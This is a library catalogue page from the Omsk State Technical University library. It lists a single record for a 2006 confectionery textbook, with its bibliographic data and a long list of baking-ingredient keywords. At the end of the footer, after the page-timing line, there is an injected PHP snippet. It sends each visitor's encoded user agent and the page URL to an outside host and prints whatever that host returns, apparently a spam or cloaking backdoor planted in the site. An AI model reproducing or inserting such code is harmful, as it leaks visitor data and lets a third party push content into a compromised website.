Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

102 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=4742B4A7-0A50-9A82-4907-B321FB9DC303$")И(("Ключевые слова=Желе"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
4742B4A7-0A50-9A82-4907-B321FB9DC303
(Нет сведений об экземплярах)
4742B4A7-0A50-9A82-4907-B321FB9DC303
36.86я7
Ш 51
Шестакова, Т. И.
Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова. - 2-е изд. - М. : Издат.-торг. корпорация "Дашков и К", 2006. - 399 с. : табл. - (Начальное профессиональное образование). - Библиогр.: с. 386. - ISBN 5-94798-844-5 : 149.00 р.
ББК
36.86я7

Рубрики:
Кондитерское производство -- УЧЕБНЫЕ ПОСОБИЯ

Кл.слова (ненормированные): мука пшеничная -- мука соевая -- мука кукурузная -- крахмал -- глюкоза -- фруктоза -- подсластитель -- патока крахмальная -- мед -- молоко -- продукты молочные -- масло сливочное -- жиры -- яйца -- яйцепродукты -- продукты вкусовые -- кислота пищевая -- вещества ароматические -- разрыхлитель -- фрукты -- цукаты -- крупа -- орехи -- мак -- улучшитель хлебобулочных изделий -- добавка биологически активна -- сливки -- изделия кондитерские -- фарш -- тесто дрожжевое -- куличи -- баба ромовая -- тесто бездрожжевое -- ватрушка -- тесто пряничное -- тесто песочное -- бисквит -- тесто заварное -- тесто слоеное -- волованы -- фритюр -- печенье -- кекс -- пицца -- сладости восточные -- сироп -- помадка -- глазури -- мастика -- карамель -- кандир для сахарных фигур -- грильяж -- желе -- марципан -- шоколад -- посыпки -- крем -- пирожные -- торты
Нет сведений об экземплярах
Держатели документа:
Омский экономический институт : Россия, г. Омск, пр. Комарова, 13
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2998 - 25.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.81 с.14 запросов, 0.61c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;